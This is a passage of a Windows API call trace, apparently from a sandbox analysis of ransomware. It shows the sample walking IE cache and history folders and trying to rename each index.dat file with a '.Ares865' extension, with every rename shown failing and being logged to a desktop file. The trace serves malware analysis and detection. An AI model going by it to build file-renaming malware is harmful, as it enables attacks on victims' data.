returned 0x7ccf [0111.707] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xb3, lpOverlapped=0x0) returned 1 [0111.708] CloseHandle (hObject=0x118) returned 1 [0111.708] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.708] CloseHandle (hObject=0x0) returned 0 [0111.708] CloseHandle (hObject=0x0) returned 0 [0111.708] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0111.708] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0111.708] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0111.814] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 166 [0111.814] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.814] GetLastError () returned 0x20 [0111.815] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 188 [0111.815] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 188 [0111.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.816] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7d82 [0111.816] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xbc, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xbc, lpOverlapped=0x0) returned 1 [0111.817] CloseHandle (hObject=0x118) returned 1 [0111.817] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.817] CloseHandle (hObject=0x0) returned 0 [0111.817] CloseHandle (hObject=0x0) returned 0 [0111.817] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0111.841] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 149 [0111.841] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.841] GetLastError () returned 0x20 [0111.841] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 171 [0111.841] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 171 [0111.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.842] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7e3e [0111.842] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xab, lpOverlapped=0x0) returned 1 [0111.843] CloseHandle (hObject=0x118) returned 1 [0111.843] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.843] CloseHandle (hObject=0x0) returned 0 [0111.843] CloseHandle (hObject=0x0) returned 0 [0111.843] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0111.844] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 174 [0111.844] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.844] GetLastError () returned 0x20 [0111.844] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 196 [0111.844] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 196 [0111.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.844] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7ee9 [0111.844] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xc4, lpOverlapped=0x0) returned 1 [0111.845] CloseHandle (hObject=0x118) returned 1 [0111.845] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.845] CloseHandle (hObject=0x0) returned 0 [0111.845] CloseHandle (hObject=0x0) returned 0 [0111.845] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0111.845] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0111.845] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0111.937] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 183 [0111.938] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.938] GetLastError () returned 0x20 [0111.938] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 205 [0111.938] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 205 [0111.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.939] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7fad [0111.939] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xcd, lpOverlapped=0x0) returned 1 [0111.941] CloseHandle (hObject=0x118) returned 1 [0111.941] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.941] CloseHandle (hObject=0x0) returned 0 [0111.941] CloseHandle (hObject=0x0) returned 0 [0111.941] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0111.966] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 166 [0111.966] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.966] GetLastError () returned 0x20 [0111.966] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 188 [0111.966] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 188 [0111.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.967] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x807a [0111.967] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xbc, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xbc, lpOverlapped=0x0) returned 1 [0111.968] CloseHandle (hObject=0x118) returned 1 [0111.968] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.968] CloseHandle (hObject=0x0) returned 0 [0111.968] CloseHandle (hObject=0x0) returned 0 [0111.968] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0111.969] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 191 [0111.969] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.969] GetLastError () returned 0x20 [0111.969] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 213 [0111.969] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 213 [0111.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.970] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8136 [0111.970] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xd5, lpOverlapped=0x0) returned 1 [0111.970] CloseHandle (hObject=0x118) returned 1 [0111.971] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.971] CloseHandle (hObject=0x0) returned 0 [0111.971] CloseHandle (hObject=0x0) returned 0 [0111.971] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0111.971] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0111.971] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0112.057] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 200 [0112.057] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.057] GetLastError () returned 0x20 [0112.058] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 222 [0112.058] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 222 [0112.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.059] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x820b [0112.059] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xde, lpOverlapped=0x0) returned 1 [0112.060] CloseHandle (hObject=0x118) returned 1 [0112.060] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.060] CloseHandle (hObject=0x0) returned 0 [0112.060] CloseHandle (hObject=0x0) returned 0 [0112.060] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0112.080] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 183 [0112.086] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.086] GetLastError () returned 0x20 [0112.086] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 205 [0112.086] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 205 [0112.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.087] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x82e9 [0112.087] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xcd, lpOverlapped=0x0) returned 1 [0112.088] CloseHandle (hObject=0x118) returned 1 [0112.088] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.088] CloseHandle (hObject=0x0) returned 0 [0112.088] CloseHandle (hObject=0x0) returned 0 [0112.088] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0112.089] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application 